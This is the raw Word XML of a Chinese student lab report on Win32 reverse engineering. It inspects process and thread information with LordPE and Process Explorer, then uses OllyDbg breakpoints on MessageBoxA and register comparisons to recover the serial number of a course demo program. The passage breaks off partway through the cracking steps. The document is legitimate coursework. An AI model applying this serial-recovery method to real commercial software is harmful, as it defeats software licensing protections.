          <w:rFonts w:ascii="等线" w:hAnsi="等线" w:eastAsia="等线"/>
          <w:b w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="11"/>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>Win32漏洞实例分析</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc54025136 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>8</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="11"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:hAnsi="等线" w:eastAsia="等线"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22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"_Toc54025137"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</w:rPr>
        <w:t>2.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:hAnsi="等线" w:eastAsia="等线"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="11"/>
        </w:rPr>
        <w:t>实验目的</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc54025137 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>8</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="11"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:hAnsi="等线" w:eastAsia="等线"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22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"_Toc54025138"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</w:rPr>
        <w:t>2.2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:hAnsi="等线" w:eastAsia="等线"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="11"/>
        </w:rPr>
        <w:t>实验要求</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc54025138 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>8</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="11"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:bookmarkStart w:id="21" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="21"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:hAnsi="等线" w:eastAsia="等线"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22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"_Toc54025139"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</w:rPr>
        <w:t>2.3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:hAnsi="等线" w:eastAsia="等线"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="11"/>
        </w:rPr>
        <w:t>实验环境</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc54025139 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>8</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="11"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:hAnsi="等线" w:eastAsia="等线"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22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"_Toc54025140"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</w:rPr>
        <w:t>2.4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:hAnsi="等线" w:eastAsia="等线"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="11"/>
        </w:rPr>
        <w:t>实验过程记录</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc54025140 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>8</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="11"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:hAnsi="等线" w:eastAsia="等线"/>
          <w:b w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22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"_Toc54025141"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</w:rPr>
        <w:t>2.实验遇到的难点与问题分析</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc54025141 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>20</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="11"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:hAnsi="等线" w:eastAsia="等线"/>
          <w:b w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22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"_Toc54025142"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</w:rPr>
        <w:t>3.实验小结</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc54025142 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>21</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="11"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:hAnsi="等线" w:eastAsia="等线"/>
          <w:b w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22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"_Toc54025143"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</w:rPr>
        <w:t>4.课程意见与建议（可选）</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc54025143 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>22</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="11"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:sectPr>
          <w:pgSz w:w="11906" w:h="16838"/>
          <w:pgMar w:top="1985" w:right="1418" w:bottom="1701" w:left="1418" w:header="851" w:footer="992" w:gutter="0"/>
          <w:pgNumType w:fmt="upperRoman" w:start="1" w:chapSep="period"/>
          <w:cols w:space="425" w:num="1"/>
          <w:docGrid w:type="linesAndChars" w:linePitch="411" w:charSpace="-2714"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="328" w:after="328"/>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc54025131"/>
      <w:bookmarkStart w:id="6" w:name="_Toc164150356"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Win32漏洞攻防工具使用与实例分析</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="328" w:after="164"/>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc54025132"/>
      <w:bookmarkStart w:id="8" w:name="_Toc164150360"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实验目的</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:topLinePunct w:val="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>掌握Win32进程的原理；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:topLinePunct w:val="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>掌握PE格式文件以及载入原理；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:topLinePunct w:val="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>掌握反汇编代码分析工具分析原理与使用方法。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="328" w:after="164"/>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Toc54025133"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实验要求</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:topLinePunct w:val="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>需独立使用进程分析工具分析Win32进程空间信息；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:topLinePunct w:val="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>以小组为单位完成反汇编分析以获得演示程序的序列号。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:topLinePunct w:val="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>测试与掌握函数反汇编执行流程</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="328" w:after="164"/>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Toc54025134"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实验环境</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:topLinePunct w:val="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>操作系统：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>W</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">indows </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:topLinePunct w:val="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>目标软件：DemoD</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>2021_Debug</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.exe</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:topLinePunct w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>分析工具：</w:t>
      </w:r>
      <w:r>
        <w:t>LordPE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>, OllyDb</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>g</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:topLinePunct w:val="0"/>
        <w:ind w:left="900"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="328" w:after="164"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="_Toc54025135"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实验过程记录</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="0" w:leftChars="0" w:firstLine="420" w:firstLineChars="0"/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使用LordPE和Processs</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Explorer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> 分析</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Win32进程空间信息</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="420" w:leftChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:bookmarkEnd w:id="8"/>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:topLinePunct w:val="0"/>
        <w:ind w:left="48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结合LordPE.exe对进程的PID进行分析，观察到关键进程在LordPE中也可查到对应的PID值，在ProcExp中以十进制表示，LordPE中以十六进制表示，进程的分布并不是完全依靠ProcexP中树型图的结构，对于一些底层支持的进程，申请位置较靠前，其余进程基本依靠调用顺序进行空间的分配。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="12"/>
        <w:spacing w:before="164" w:after="164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44210" cy="2005330"/>
            <wp:effectExtent l="0" t="0" r="8890" b="4445"/>
            <wp:docPr id="23" name="图片 23" descr="%_8IUZ~2~176IP]X}I{%]Y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%_8IUZ~2~176IP]X}I{%]YQ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42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 w:val="0"/>
        <w:ind w:left="48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2. 选取分析对象为Demo2021_Debug.exe程序对单个进程进行分析</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="12"/>
        <w:spacing w:before="164" w:after="164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55005" cy="1266825"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:docPr id="24" name="图片 24" descr="J[6U9[OPW5CF2`E9`JGMVT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J[6U9[OPW5CF2`E9`JGMVT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 w:val="0"/>
        <w:ind w:left="48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3.双击后可以看到该进程的详细信息，包括CPU优先权、虚拟内存占用大小、所在页和读写次数等；点击线程可观察到该进程包含5个线程。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="12"/>
        <w:tabs>
          <w:tab w:val="right" w:pos="9070"/>
        </w:tabs>
        <w:spacing w:before="164" w:after="164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709545" cy="3045460"/>
            <wp:effectExtent l="0" t="0" r="5080" b="2540"/>
            <wp:docPr id="26" name="图片 26" descr="{Z~YHNQE(TVR[NXVX7KIPR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{Z~YHNQE(TVR[NXVX7KIPR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954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700020" cy="3154680"/>
            <wp:effectExtent l="0" t="0" r="5080" b="7620"/>
            <wp:docPr id="25" name="图片 25" descr="BHI~8]~K0){60E_[4LQIV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BHI~8]~K0){60E_[4LQIVI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002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topLinePunct w:val="0"/>
        <w:ind w:left="48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4.更进一步，双击线程可查看该线程的栈空间调用信息，信息从下向上读取，可观察到，Demo2020线程调用的栈信息和顺序，如下：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="12"/>
        <w:tabs>
          <w:tab w:val="right" w:pos="9070"/>
        </w:tabs>
        <w:spacing w:before="164" w:after="164"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="4D4D4D"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="12"/>
        <w:tabs>
          <w:tab w:val="right" w:pos="9070"/>
        </w:tabs>
        <w:spacing w:before="164" w:after="164"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="4D4D4D"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="12"/>
          <w:szCs w:val="12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2"/>
          <w:szCs w:val="12"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4723765" cy="3559810"/>
            <wp:effectExtent l="0" t="0" r="635" b="2540"/>
            <wp:docPr id="28" name="图片 28" descr="U4]TTTQYE7W4@O`$((K2)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U4]TTTQYE7W4@O`$((K2)8C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 w:val="0"/>
        <w:ind w:left="480" w:leftChars="0"/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12"/>
          <w:szCs w:val="12"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:topLinePunct w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>使用OD</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>分析获得</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Demo2021_Debug.exe的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>序列号</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:topLinePunct w:val="0"/>
        <w:ind w:left="480" w:leftChars="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:topLinePunct w:val="0"/>
        <w:ind w:left="480"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1.根据报错提示输入四部分序列号，根据提示框得知序列号形式为“xxxx-xxxx-xxxx-xxxx”。由此可知该序列号破解存在一个切入点，即序列号错误时MassageBoxA的调用。因此利用OD的“设置API断点”对所有MassageBoxA设下断点，如下图：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84800" cy="767715"/>
            <wp:effectExtent l="0" t="0" r="6350" b="3810"/>
            <wp:docPr id="2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767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 w:val="0"/>
        <w:ind w:left="480"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opLinePunct w:val="0"/>
        <w:ind w:left="480"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运行程序，输入任意测试序列号后，成功截断。分析此时堆栈中的信息提示，观察到图中最后一行提及父函数，点击该行并回车后将进入父函数，在该模块中中使用智能搜索，找到四部分序列号的提示，双击定位到其代码处。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:topLinePunct w:val="0"/>
        <w:ind w:left="480" w:leftChars="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="12"/>
        <w:tabs>
          <w:tab w:val="right" w:pos="9070"/>
        </w:tabs>
        <w:spacing w:before="164" w:after="164"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="4D4D4D"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="12"/>
        <w:tabs>
          <w:tab w:val="right" w:pos="9070"/>
        </w:tabs>
        <w:spacing w:before="164" w:after="164"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="4D4D4D"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="12"/>
        <w:tabs>
          <w:tab w:val="right" w:pos="9070"/>
        </w:tabs>
        <w:spacing w:before="164" w:after="164"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="4D4D4D"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="12"/>
          <w:szCs w:val="12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2"/>
          <w:szCs w:val="12"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4065270" cy="1824355"/>
            <wp:effectExtent l="0" t="0" r="1905" b="4445"/>
            <wp:docPr id="30" name="图片 30" descr="_MF%JJJNXT{$1~K@DSD37II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_MF%JJJNXT{$1~K@DSD37II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527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tabs>
          <w:tab w:val="right" w:pos="9070"/>
        </w:tabs>
        <w:spacing w:before="164" w:after="164"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="宋体" w:cs="Arial"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="4D4D4D"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="12"/>
          <w:szCs w:val="12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2"/>
          <w:szCs w:val="12"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5077460" cy="3196590"/>
            <wp:effectExtent l="0" t="0" r="8890" b="3810"/>
            <wp:docPr id="31" name="图片 31" descr="I%{0MSE9M3}Z_7SO@6X]1J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%{0MSE9M3}Z_7SO@6X]1J0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 w:val="0"/>
        <w:ind w:left="480"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3.在第一部分比对之前设置硬件执行断点，成功断下之后，使用F8单步执行，观察运行到  cmp eax,ecx时，eax和ecx寄存器的值，发现eax即为我们输入的值，则ecx即为正确序列号的第一部分，将其放入第一部分序列号中重新运行，发现提示，第一部分序列号正确。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="12"/>
        <w:tabs>
          <w:tab w:val="right" w:pos="9070"/>
        </w:tabs>
        <w:spacing w:before="164" w:after="164"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="4D4D4D"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
